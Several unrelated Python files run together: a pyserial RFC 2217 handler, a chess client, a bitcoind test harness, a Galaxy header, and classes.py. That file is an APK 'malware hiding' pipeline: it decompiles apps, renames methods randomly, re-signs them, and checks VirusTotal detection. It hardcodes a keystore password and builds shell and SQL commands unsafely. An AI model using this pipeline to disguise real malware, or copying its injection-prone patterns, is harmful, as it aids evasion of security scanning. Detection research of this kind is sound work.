self.rfc2217SendSubnegotiation(SERVER_SET_DATASIZE, struct.pack("!B", self.serial.bytesize))
elif suboption[1:2] == SET_PARITY:
backup = self.serial.parity
try:
parity = struct.unpack("!B", suboption[2:3])[0]
if parity != 0:
self.serial.parity = RFC2217_REVERSE_PARITY_MAP[parity]
except ValueError as e:
if self.logger:
self.logger.error("failed to set parity: %s" % (e,))
self.serial.parity = backup
else:
if self.logger:
self.logger.info("%s parity: %s" % (parity and 'set' or 'get', self.serial.parity))
self.rfc2217SendSubnegotiation(
SERVER_SET_PARITY,
struct.pack("!B", RFC2217_PARITY_MAP[self.serial.parity])
)
elif suboption[1:2] == SET_STOPSIZE:
backup = self.serial.stopbits
try:
stopbits = struct.unpack("!B", suboption[2:3])[0]
if stopbits != 0:
self.serial.stopbits = RFC2217_REVERSE_STOPBIT_MAP[stopbits]
except ValueError as e:
if self.logger:
self.logger.error("failed to set stop bits: %s" % (e,))
self.serial.stopbits = backup
else:
if self.logger:
self.logger.info("%s stop bits: %s" % (stopbits and 'set' or 'get', self.serial.stopbits))
self.rfc2217SendSubnegotiation(
SERVER_SET_STOPSIZE,
struct.pack("!B", RFC2217_STOPBIT_MAP[self.serial.stopbits])
)
elif suboption[1:2] == SET_CONTROL:
if suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING:
if self.serial.xonxoff:
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif self.serial.rtscts:
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
else:
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL:
self.serial.xonxoff = False
self.serial.rtscts = False
if self.logger:
self.logger.info("changed flow control to None")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTROL:
self.serial.xonxoff = True
if self.logger:
self.logger.info("changed flow control to XON/XOFF")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTROL:
self.serial.rtscts = True
if self.logger:
self.logger.info("changed flow control to RTS/CTS")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_REQ_BREAK_STATE:
if self.logger:
self.logger.warning("requested break state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_BREAK_ON:
self.serial.setBreak(True)
if self.logger:
self.logger.info("changed BREAK to active")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_ON)
elif suboption[2:3] == SET_CONTROL_BREAK_OFF:
self.serial.setBreak(False)
if self.logger:
self.logger.info("changed BREAK to inactive")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_DTR:
if self.logger:
self.logger.warning("requested DTR state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_DTR_ON:
self.serial.setDTR(True)
if self.logger:
self.logger.info("changed DTR to active")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_ON)
elif suboption[2:3] == SET_CONTROL_DTR_OFF:
self.serial.setDTR(False)
if self.logger:
self.logger.info("changed DTR to inactive")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_RTS:
if self.logger:
self.logger.warning("requested RTS state - not implemented")
pass # XXX needs cached value
#~ self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_ON:
self.serial.setRTS(True)
if self.logger:
self.logger.info("changed RTS to active")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_OFF:
self.serial.setRTS(False)
if self.logger:
self.logger.info("changed RTS to inactive")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_OFF)
#~ elif suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_DCD_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DTR_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DSR_FLOW_CONTROL:
elif suboption[1:2] == NOTIFY_LINESTATE:
# client polls for current state
self.rfc2217SendSubnegotiation(
SERVER_NOTIFY_LINESTATE,
to_bytes([0]) # sorry, nothing like that implemented
)
elif suboption[1:2] == NOTIFY_MODEMSTATE:
if self.logger:
self.logger.info("request for modem state")
# client polls for current state
self.check_modem_lines(force_notification=True)
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
if self.logger:
self.logger.info("suspend")
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
if self.logger:
self.logger.info("resume")
self._remote_suspend_flow = False
elif suboption[1:2] == SET_LINESTATE_MASK:
self.linstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("line state mask: 0x%02x" % (self.linstate_mask,))
elif suboption[1:2] == SET_MODEMSTATE_MASK:
self.modemstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("modem state mask: 0x%02x" % (self.modemstate_mask,))
elif suboption[1:2] == PURGE_DATA:
if suboption[2:3] == PURGE_RECEIVE_BUFFER:
self.serial.flushInput()
if self.logger:
self.logger.info("purge in")
self.rfc2217SendSubnegotiation(SERVER_PURGE_DATA, PURGE_RECEIVE_BUFFER)
elif suboption[2:3] == PURGE_TRANSMIT_BUFFER:
self.serial.flushOutput()
if self.logger:
self.logger.info("purge out")
self.rfc2217SendSubnegotiation(SERVER_PURGE_DATA, PURGE_TRANSMIT_BUFFER)
elif suboption[2:3] == PURGE_BOTH_BUFFERS:
self.serial.flushInput()
self.serial.flushOutput()
if self.logger:
self.logger.info("purge both")
self.rfc2217SendSubnegotiation(SERVER_PURGE_DATA, PURGE_BOTH_BUFFERS)
else:
if self.logger:
self.logger.error("undefined PURGE_DATA: %r" % list(suboption[2:]))
else:
if self.logger:
self.logger.error("undefined COM_PORT_OPTION: %r" % list(suboption[1:]))
else:
if self.logger:
self.logger.warning("unknown subnegotiation: %r" % (suboption,))
# simple client test
if __name__ == '__main__':
import sys
s = Serial('rfc2217://localhost:7000', 115200)
sys.stdout.write('%s\n' % s)
#~ s.baudrate = 1898
sys.stdout.write("write...\n")
s.write("hello\n")
s.flush()
sys.stdout.write("read: %s\n" % s.read(5))
#~ s.baudrate = 19200
#~ s.databits = 7
s.close()
|
online_chess.py
|
# coding: UTF-8
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import json
import urllib
import urllib2
import sys
import logging
import threading
from time import sleep, time
from scenes.chess import Chess
from cython.functions import tuple_to_chess_notation, chess_notation_to_tuple
from consts.colors import BLACK, WHITE, next
from consts.urls import (
URL_BASE,
NEW_GAME,
JOIN_GAME,
NEW_MOVE,
WAITING_MOVE_VALIDATION,
VALIDATE_MOVE,
SHOW_MOVE,
NEW_GAME_OVER_REQUEST,
WAITING_GAME_OVER_VALIDATION,
SHOW_GAME_OVER,
SUCCESS,
SUCCESS_CODES
)
from consts.pieces import (
PAWN,
KNIGHT,
BISHOP,
ROOK,
QUEEN,
KING,
)
INVALID_REQUEST = "INVALID REQUEST"
INVALID_TURN = "INVALID TURN"
PROMOTION_MAP = {
0: ROOK,
1: KNIGHT,
2: BISHOP,
3: QUEEN,
4: KING,
5: PAWN
}
def html_request(url, method, values={}):
try:
data = urllib.urlencode(values)
request = urllib2.Request(url, data)
request.get_method = lambda: method
result = json.load(urllib2.urlopen(request))
if not result['code'] in SUCCESS_CODES:
raise Exception(INVALID_REQUEST, result['code'], result['message'])
if not result['code'] == 19:
if 'board' in result:
del result['board']
print(time(), result)
return result
except Exception as e:
logging.exception('URL {0} {1}\n{3}\n{2}'.format(
method, url, str(e), values
))
raise e
def post(url, values={}):
return html_request(url, 'POST', values)
def get(url, values={}):
return html_request(url, 'GET', values)
class OnlineChess(Chess):
def __init__(self, game, level_white, level_black, id=None, *args, **kwargs):
if level_white != -1:
data = post(URL_BASE + NEW_GAME, {'player_name': 'wgrupo1'})
self.online = BLACK
self.player_key = data['player_key']
self.game_id = data['game_id']
self.player_name = 'wgrupo1'
if level_black != -1:
self.game_id = id
data = post(URL_BASE + JOIN_GAME, {
'player_name': 'bgrupo1',
'game_id': self.game_id,
})
self.online = WHITE
self.player_key = data['player_key']
self.player_name = 'bgrupo1'
self.sent_end_game = False
super(OnlineChess, self).__init__(game, level_white, level_black, *args, **kwargs)
threading.Thread(target=self.wait_end_game_validation).start()
def do_move(self, selected, square, promotion=5):
color = self.board.color()
move = self.board.move(selected, square, promotion)
if self.online == color:
data = post(URL_BASE + VALIDATE_MOVE, {
'move_id': self.move_id,
'player_key': self.player_key,
'valid': 'true' if move else 'false'
})
return move
elif move:
move_type = move.type()
param = {
'game_id': self.game_id,
'player_key': self.player_key,
'type': move_type
}
if move_type in [0, 2, 3]:
param['move_from'] = tuple_to_chess_notation(selected)
param['move_to'] = tuple_to_chess_notation(square)
if move_type == 1: #castling
param['rook_from'] = tuple_to_chess_notation(move.rook_from())
param['rook_to'] = tuple_to_chess_notation(move.rook_to())
param['king_from'] = tuple_to_chess_notation(selected)
param['king_to'] = tuple_to_chess_notation(square)
if move_type == 2: #en passant
param['eliminated_pawn'] = tuple_to_chess_notation(
move.get_eliminated_pawn())
if move_type == 3: #promotion
param['promotion_type'] = 3 #queen
data = post(URL_BASE + NEW_MOVE, param)
self.move_id = data['move']['id']
while self.running:
self.do_jit_draw()
data = get(URL_BASE + SHOW_MOVE.format(self.move_id))
if data['move']['validation_time']:
if not data['move']['legal']:
move.undo_update(self.board)
return False
else:
return move
sleep(3)
return False
def wait_move_validation(self):
while self.running:
data = get(URL_BASE + WAITING_MOVE_VALIDATION, {
'game_id': self.game_id
})
if 'move' in data:
self.move_id = data['move']['id']
move_type = data['move']['move_type']
move = data['move']['movimentations'][0]
if move_type == 1: #castling
for move in data['move']['movimentations']:
if move['from'] in ['e1', 'e8']:
return (
chess_notation_to_tuple(move['from']),
chess_notation_to_tuple(move['to']),
5
)
elif move_type == 3: #promotion
return (
chess_notation_to_tuple(move['from']),
chess_notation_to_tuple(move['to']),
PROMOTION_MAP[data['move']['promotion_type']]
)
return (
chess_notation_to_tuple(move['from']),
chess_notation_to_tuple(move['to']),
5
)
sleep(3)
def wait_end_game_validation(self):
while self.running:
if self.sent_end_game:
continue
data = get(URL_BASE + WAITING_GAME_OVER_VALIDATION, {
'game_id': self.game_id
})
if 'game_over_request' in data:
request = data['game_over_request']
if request['winner'] == self.player_name:
self.end_game(1 if self.online == BLACK else -1)
else:
end = self.verify_status(self.board.status(None))
if not end:
if not request['winner']:
self.sent_end_game = True
self.other_player.confirm_draw()
else:
self.send_illigal_endgame()
def request_draw(self):
self.end_game(0)
def send_illigal_endgame(self):
post(URL_BASE + NEW_GAME_OVER_REQUEST, {
'game_id': self.game_id,
'player_key': self.player_key,
'result': 1
})
def deny_draw(self, player, send=True):
if send:
self.send_illigal_endgame()
Chess.deny_draw(self, player)
self.sent_end_game = False
def end_game(self, state):
self.sent_end_game = True
data = post(URL_BASE + NEW_GAME_OVER_REQUEST, {
'game_id': self.game_id,
'player_key': self.player_key,
'result': state * (1 if self.online == BLACK else -1)
})
self.game_over_request_id = data['game_over_request_id']
if data['code'] == 14:
Chess.end_game(self, state)
while self.running:
data = get(URL_BASE + SHOW_GAME_OVER.format(
self.game_over_request_id
))
if data['game_over_request']['validation_time']:
if data['game_over_request']['legal']:
Chess.end_game(self, state)
#self.sent_end_game = False
else:
self.deny_draw(self.current_player, send=False)
return None
sleep(3)
|
classes.py
|
import os
import time
import string
import random
import requests
import threading
import mysql.connector
from mysql.connector import Error
class Apk:
def __init__(self, name, method):
self.downloadedDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/necessaryFiles/apk/"
self.name = name
self.method = method
self.destDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/coreSystem/Malware/"
self.createDir = "mkdir " + str(self.destDir) + str(self.name) + "/"
self.morphPath = "/var/www/catchmeifyoucan.tech/html/Morph/"
self.copyFilePath = ""
def copyApk(self):
def doCopy():
os.system(self.createDir)
copyCommand = "cp " + str(self.downloadedDir) + str(self.name) + ".apk" + " " + str(self.destDir) + str(
self.name) + "/" + str(self.name) + ".apk"
os.system(copyCommand)
print("APK COPIED")
p = threading.Thread(target=doCopy)
p.start()
p.join()
return str(self.destDir) + str(self.name) + "/"
def createFile(self):
os.system("mkdir " + str(self.morphPath) + str(self.name))
def copyFileForRecompile(self):
def fileCopyToMorph():
"""self.copyFilePath = "cp -r " + str(self.destDir) + str(self.name) + "/" + str(self.name) + "/ "
self.copyFilePath += str(self.morphPath) + str(self.name) + "/" + str(self.method) + "/"""
print(str(self.copyFilePath))
print(str(self.morphPath))
"""copyPath = self.createDir + self.name + "-" + self.method
print(str(copyPath))
os.system(copyPath)"""
os.system(self.copyFilePath)
print("Burada sorun yok")
p = threading.Thread(target=fileCopyToMorph)
p.start()
p.join()
def copyFileForTransform(self):
def fileCopyToDir():
self.copyFilePath = "cp -r " + str(self.destDir) + str(self.name) + "/" + str(self.name) + "/ "
self.copyFilePath += str(self.destDir) + str(self.name) + "/" + str(self.method) + "/"
print(str(self.copyFilePath))
os.system(self.copyFilePath)
p = threading.Thread(target=fileCopyToDir)
p.start()
p.join()
class Decompiler():
def __init__(self, name, dir):
self.apkName = name
self.apkDir = dir
self.dex2jarDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/necessaryFiles/dex2jar-2.0/"
def apkToSmali(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
def runApkTool():
apkDecodeCommand = "apktool d " + self.apkName + ".apk"
os.system(apkDecodeCommand)
p = threading.Thread(target=runApkTool)
p.start()
p.join()
os.chdir(myDir)
def getDexFromApk(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
def apkToZip():
os.system("mv " + str(self.apkName) + ".apk " + str(self.apkName) + ".zip")
os.system("unzip " + str(self.apkName) + ".zip -d " + str(self.apkName) + "-unzipped")
p = threading.Thread(target=apkToZip)
p.start()
p.join()
os.system("mv " + str(self.apkName) + ".zip " + str(self.apkName) + ".apk")
os.system("mkdir " + str(self.apkName) + "-dex2jar")
os.system("mv " + str(self.apkName) + "-unzipped/classes.dex " + str(self.apkName) + "-dex2jar/classes.dex")
os.system("rm -rf " + str(self.apkName) + "-unzipped")
os.chdir(myDir)
def dex2jar(self):
myDir = os.getcwd()
os.chdir(self.apkDir + str(self.apkName) + "-dex2jar/")
dex2jarCommand = str(self.dex2jarDir) + "d2j-dex2jar.sh classes.dex"
def runDex2Jar():
os.system(dex2jarCommand)
p = threading.Thread(target=runDex2Jar)
p.start()
p.join()
os.chdir(myDir)
class Recompiler():
def __init__(self, apkName, dirName):
self.apkName = apkName
self.apkDir = dirName
def recompileApk(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
def doRecompile():
recompileCommand = "apktool b " + self.apkName
os.system(recompileCommand)
p = threading.Thread(target=doRecompile())
p.start()
p.join()
os.chdir(myDir)
return self.apkDir + self.apkName + "/dist/"
class Signer():
def __init__(self, apkName, apkDir):
self.aliasName = "catchmeifyoucan"
self.jarSignerLocation = "/usr/lib/jvm/java-11-openjdk-amd64/bin/"
self.jarSignerCommand = "jarsigner -storepass vfLax2TwF9YW -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore "
self.keyStoreDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/necessaryFiles/keyStore/key.keystore "
self.apkName = apkName
self.apkDir = apkDir
self.jarSignerCommand += str(self.keyStoreDir) + " " + str(self.apkName) + ".apk " + str(self.aliasName)
self.zipalignCommand = "/usr/lib/android-sdk/build-tools/debian/zipalign -v 4 " + str(
self.apkName) + ".apk out.apk"
# print(self.zipalignCommand)
def signApk(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
# print(str(self.jarSignerLocation) + self.jarSignerCommand)
def doSign():
resignCommand = str(self.jarSignerLocation) + self.jarSignerCommand
os.system(resignCommand)
p = threading.Thread(target=doSign)
p.start()
p.join()
def doZipalign():
os.system(self.zipalignCommand)
p1 = threading.Thread(target=doZipalign)
p1.start()
p1.join()
os.system("rm -rf " + str(self.apkName) + ".apk")
os.system("mv out.apk " + str(self.apkName) + ".apk")
os.chdir(myDir)
class Tester():
def __init__(self, name, dir):
self.apkName = name + ".apk"
self.apkDir = dir
self.url = "https://www.virustotal.com/vtapi/v2/file/"
self.scanUrl = self.url + "scan"
self.reportUrl = self.url + "report"
self.apiPool = {
}
self.report = {
'isMalware': "",
str(self.apkName): []
}
def isApkMalware(self):
def scanApk(publicApiKey):
print("Scanning File: " + str(self.apkDir + self.apkName))
print("Scan url: " + self.scanUrl)
params = {'apikey': publicApiKey}
files = {'file': (str(self.apkName), open(str(self.apkDir + self.apkName), 'rb'))}
response = requests.post(str(self.scanUrl), files=files, params=params)
if str(response.status_code) != '204':
rsc = response.json()['resource']
return rsc
else:
return '204'
def reportApk(publicApiKey, scanResource):
# time.sleep(10)
msg = "Your resource is queued for analysis"
while msg != 'Scan finished, information embedded':
print("verbose_msg: " + msg)
time.sleep(10)
params = {'apikey': publicApiKey, 'resource': scanResource}
response = requests.get(self.reportUrl, params=params)
if response.status_code == 204:
return False
msg = response.json()['verbose_msg']
return [response.json()['positives'], response.json()['total']]
for api in self.apiPool:
print("APK Scanning...")
resources = scanApk(self.apiPool[api])
if resources == '204':
print("API limit expired, changing API...")
continue
print("APK Scanned, resources received!\nRecources: " + resources)
print("APK Reporting...")
results = reportApk(self.apiPool[api], resources)
if not results:
print("API limit expired, changing API...")
continue
print("APK Reported, results received!")
self.report['isMalware'] = 'True'
self.report[self.apkName] = results
return self.report
class Database():
def __init__(self, apkName):
self.apkName = apkName
self.user = "root"
self.database = "catchmeifyoucan"
def connect(self):
return mysql.connector.connect(user=self.user, database=self.database)
def insertApk(self, methodId, positives, total, firstResult):
cnx = self.connect()
cursor = cnx.cursor(buffered=True)
addApk = """INSERT INTO apktable (APKname) VALUES ('""" + self.apkName + """')"""
cursor.execute(addApk)
print("Apk added to database")
maxid = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.close()
self.insertMethodResult(maxid, methodId, positives, total, firstResult)
def insertMethodResult(self, apkId, methodId, positive, total, firstSearch):
cnx = self.connect()
cursor = cnx.cursor(buffered=True)
addApk = """INSERT INTO results (APKid, mid, firstSearch, positive, total) VALUES (""" + str(apkId) + """, """ + str(methodId) + """, """ + str(firstSearch) + """, """ + str(positive) + """, """ + str(total) + """)"""
print(addApk)
cursor.execute(addApk)
print("Results saved to database")
cnx.commit()
cursor.close()
cnx.close()
def getResultsOfLastApk(self):
cnx = self.connect()
cursor = cnx.cursor(buffered=True)
addApk = """SELECT * FROM results WHERE APKid = (select max(APKid) from apktable)"""
cursor.execute(addApk)
for a in cursor:
print(a)
cnx.commit()
cursor.close()
cnx.close()
#return SELECT * FROM `results` WHERE APKid = (select max(APKid) from apktable)
def getResultsOfAllApks(self):
print()
class Analyzer():
def __init__(self, name, result):
self.fileName = name
self.results = [["NONE", result]]
self.id = -1
def addToResults(self, transform, res):
self.results.append(res)
def showResults(self):
print(self.results)
def addToDataBase(self):
def doAdd():
print("added")
return 1
self.id = doAdd(self.results)
class Transformer():
def __init__(self, name, dir):
self.apkName = name
self.apkDir = dir
# os.system("mkdir " + dir + "Transformed versions")
self.morphs = ['Repacking','Method-Name-Transformer']
# for morph in morphs:
# os.system("mkdir " + dir + "Transformed versions/" + morph)
# METHOD TRANSFORMER VARIABLES
self.methodNames = {}
self.unwantedMethodType = [
' public ',
' static ',
' constructor ',
' protected '
]
self.allMethods = []
self.allModifiableMethods = []
self.method = []
def randomStrings(self, stringLength=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def getListOfFiles(self):
dirName = self.apkDir + self.apkName + "/smali/"
print("*************************************\nDIRNAME\n***********************************")
print(dirName)
listOfFiles = list()
for (dirpath, dirnames, filenames) in os.walk(dirName):
print("ddddsfadlşkfk")
listOfFiles += [os.path.join(dirpath, file) for file in filenames]
return listOfFiles
def methodTransformer(self):
def findMethods():
controller = False
for smaliFile in smaliFileList:
with open(smaliFile) as fp:
for cnt, line in enumerate(fp):
controller = False
if '.method ' in line:
splittedLine = str(line.split(" ")[-1]).split("(")[0]
if splittedLine not in self.allMethods and len(splittedLine) > 1:
self.allMethods.append(splittedLine)
for word in self.unwantedMethodType:
if word in line:
controller = True
if not controller:
self.allModifiableMethods.append([splittedLine, smaliFile, cnt])
def createRandomNames():
for methods in self.allModifiableMethods:
nN = self.randomStrings(random.randint(10, 15))
if nN not in self.allMethods:
self.methodNames[methods[0]] = nN
else:
createRandomNames()
break
def changeMethods():
for method, newName in self.methodNames.items():
for file in smaliFileList:
#print("Method: " + method + " " + file)
def doChange():
fin = open(file, "rt")
fout = open(file[:-6] + "-1.smali", "wt")
for line in fin:
fout.write(line.replace(method, newName))
fin.close()
fout.close()
p = threading.Thread(target=doChange)
p.start()
p.join()
os.remove(file)
os.rename(str(file[:-6] + "-1.smali"), file)
smaliFileList = self.getListOfFiles()
findMethods()
createRandomNames()
changeMethods()
|
bitcoind.py
|
import decimal
import json
import logging
import os
import threading
from cheroot.wsgi import PathInfoDispatcher, Server
from decimal import Decimal
from ephemeral_port_reserve import reserve
from flask import Flask, request, Response
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
from test_framework.utils import TailableProc, wait_for, TIMEOUT, BITCOIND_PATH, COIN
class BitcoindRpcInterface:
def __init__(self, data_dir, network, rpc_port):
self.cookie_path = os.path.join(data_dir, network, ".cookie")
self.rpc_port = rpc_port
self.wallet_name = "revaultd-tests"
def __getattr__(self, name):
assert not (name.startswith("__") and name.endswith("__")), "Python internals"
with open(self.cookie_path) as fd:
authpair = fd.read()
service_url = (
f"http://{authpair}@localhost:{self.rpc_port}/wallet/{self.wallet_name}"
)
proxy = AuthServiceProxy(service_url, name)
def f(*args):
return proxy.__call__(*args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir, rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.p2pport = reserve()
self.prefix = "bitcoind"
regtestdir = os.path.join(bitcoin_dir, "regtest")
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
BITCOIND_PATH,
"-datadir={}".format(bitcoin_dir),
"-printtoconsole",
"-server",
]
bitcoind_conf = {
"port": self.p2pport,
"rpcport": rpcport,
"debug": 1,
"fallbackfee": Decimal(1000) / COIN,
"rpcthreads": 32,
}
self.conf_file = os.path.join(bitcoin_dir, "bitcoin.conf")
with open(self.conf_file, "w") as f:
f.write("chain=regtest\n")
f.write("[regtest]\n")
for k, v in bitcoind_conf.items():
f.write(f"{k}={v}\n")
self.rpc = BitcoindRpcInterface(bitcoin_dir, "regtest", rpcport)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
# wait_for_mempool can be used to wait for the mempool before generating
# blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(
lambda: all(
txid in self.rpc.getrawmempool() for txid in wait_for_mempool
)
)
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
old_blockcount = self.rpc.getblockcount()
addr = self.rpc.getnewaddress()
self.rpc.generatetoaddress(numblocks, addr)
wait_for(lambda: self.rpc.getblockcount() == old_blockcount + numblocks)
def get_coins(self, amount_btc):
# subsidy halving is every 150 blocks on regtest, it's a rough estimate
# to avoid looping in most cases
numblocks = amount_btc // 25 + 1
while self.rpc.getbalance() < amount_btc:
self.generate_block(numblocks)
def generate_blocks_censor(self, n, txids):
"""Generate {n} blocks ignoring {txids}"""
fee_delta = 1000000
for txid in txids:
self.rpc.prioritisetransaction(txid, None, -fee_delta)
self.generate_block(n)
for txid in txids:
self.rpc.prioritisetransaction(txid, None, fee_delta)
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height={height} and:
- If shift >=0:
- re-mine all mempool transactions into {height} + shift
(with shift floored at 1)
- Else:
- don't re-mine the mempool transactions
Note that tx's that become invalid at {height} (because coin maturity,
locktime etc.) are removed from mempool. The length of the new chain
will be original + 1 OR original + {shift}, whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1,
use {height}=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can
be pulled forward to h1.
2. Set {height}=h2 and {shift}= h1-h2
"""
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
if height + shift > orig_len:
final_len = height + shift
else:
final_len = 1 + orig_len
self.rpc.invalidateblock(old_hash)
self.wait_for_log(
r"InvalidChainFound: invalid block=.* height={}".format(height)
)
memp = self.rpc.getrawmempool()
if shift < 0:
self.generate_blocks_censor(1 + final_len - height, memp)
elif shift == 0:
self.generate_block(1 + final_len - height, memp)
else:
self.generate_blocks_censor(shift, memp)
self.generate_block(1 + final_len - (height + shift), memp)
self.wait_for_log(r"UpdateTip: new best=.* height={}".format(final_len))
def startup(self):
try:
self.start()
except Exception:
self.stop()
raise
info = self.rpc.getnetworkinfo()
if info["version"] < 220000:
self.rpc.stop()
raise ValueError(
"bitcoind is too old. Minimum supported version is 0.22.0."
" Current is {}".format(info["version"])
)
def cleanup(self):
try:
self.stop()
except Exception:
self.proc.kill()
self.proc.wait()
class DecimalEncoder(json.JSONEncoder):
"""By default json.dumps does not handle Decimals correctly, so we override its handling"""
def default(self, o):
if isinstance(o, decimal.Decimal):
return float(o)
return super(DecimalEncoder, self).default(o)
class BitcoindRpcProxy(object):
"""A proxy to the bitcoind RPC interface that can replace commands with arbitrary results.
Starts a HTTP server in a thread, listens for incoming JSONRPC requests, and responds with
either a mocked result or the result it got from bitcoind.
This was taken and adapted from the C-lightning test suite.
"""
def __init__(self, bitcoind_rpc_port, bitcoind_cookie_path, mocks):
self.app = Flask("BitcoindProxy")
self.app.add_url_rule(
"/",
"Entrypoint",
self.proxy,
methods=["POST"],
defaults={"path": ""},
)
self.app.add_url_rule(
"/<path:path>",
"Entrypoint",
self.proxy,
methods=["POST"],
)
self.rpcport = reserve()
# A mapping from method name to result as a dict.
# Eventually, the results could be callable.
self.mocks = mocks
self.bitcoind_rpc_port = bitcoind_rpc_port
self.bitcoind_cookie_path = bitcoind_cookie_path
self.start()
def __del__(self):
self.stop()
def _handle_request(self, r, path):
"""Handle a JSONRPC request {r} made to the HTTP endpoint {path} (to handle
wallet paths)"""
method = r["method"]
# If we have set a mock for this method reply with that
if method in self.mocks:
return {"id": r["id"], "error": None, "result": self.mocks[method]}
# Otherwise, just forward the request
with open(self.bitcoind_cookie_path) as fd:
authpair = fd.read()
service_url = f"http://{authpair}@localhost:{self.bitcoind_rpc_port}/{path}"
try:
res = AuthServiceProxy(service_url, r["method"])(*r["params"])
return {"result": res, "id": r["id"]}
except JSONRPCException as e:
return {"error": e.error, "id": r["id"]}
def proxy(self, path):
r = json.loads(request.data.decode("ASCII"))
if isinstance(r, list):
reply = [self._handle_request(subreq, path) for subreq in r]
else:
reply = self._handle_request(r, path)
# \r\n because rust-jsonrpc expects it..
response = Response(json.dumps(reply, cls=DecimalEncoder) + "\r\n")
response.headers["Content-Type"] = "application/json"
return response
def start(self):
self.server = Server(
("127.0.0.1", self.rpcport),
self.app,
numthreads=32,
request_queue_size=10,
accepted_queue_timeout=20,
timeout=TIMEOUT * 2,
)
self.proxy_thread = threading.Thread(target=self.server.start)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that bitcoind is running on the real rpcport, let's tell all
# future callers to talk to the proxyport. We use the bind_addr as a
# signal that the port is bound and accepting connections.
while self.server.bind_addr[1] == 0:
pass
self.rpcport = self.server.bind_addr[1]
def stop(self):
self.server.stop()
self.proxy_thread.join()
|
__init__.py
|
"""
objectstore package, abstraction for storing blobs of data for use in Galaxy.
all providers ensure that data can be accessed on the filesystem for running
tools
"""
import abc
import logging
import os
import random
import shutil
import threading
import time
from typing import (
Any,
Dict,
List,
Type,
)
import yaml
from galaxy.exceptions import (
ObjectInvalid,
ObjectNotFound,
)
from galaxy.util import (
asbool,
directory_hash_id,
force_symlink,
parse_xml,
umask_fix_perms,
)
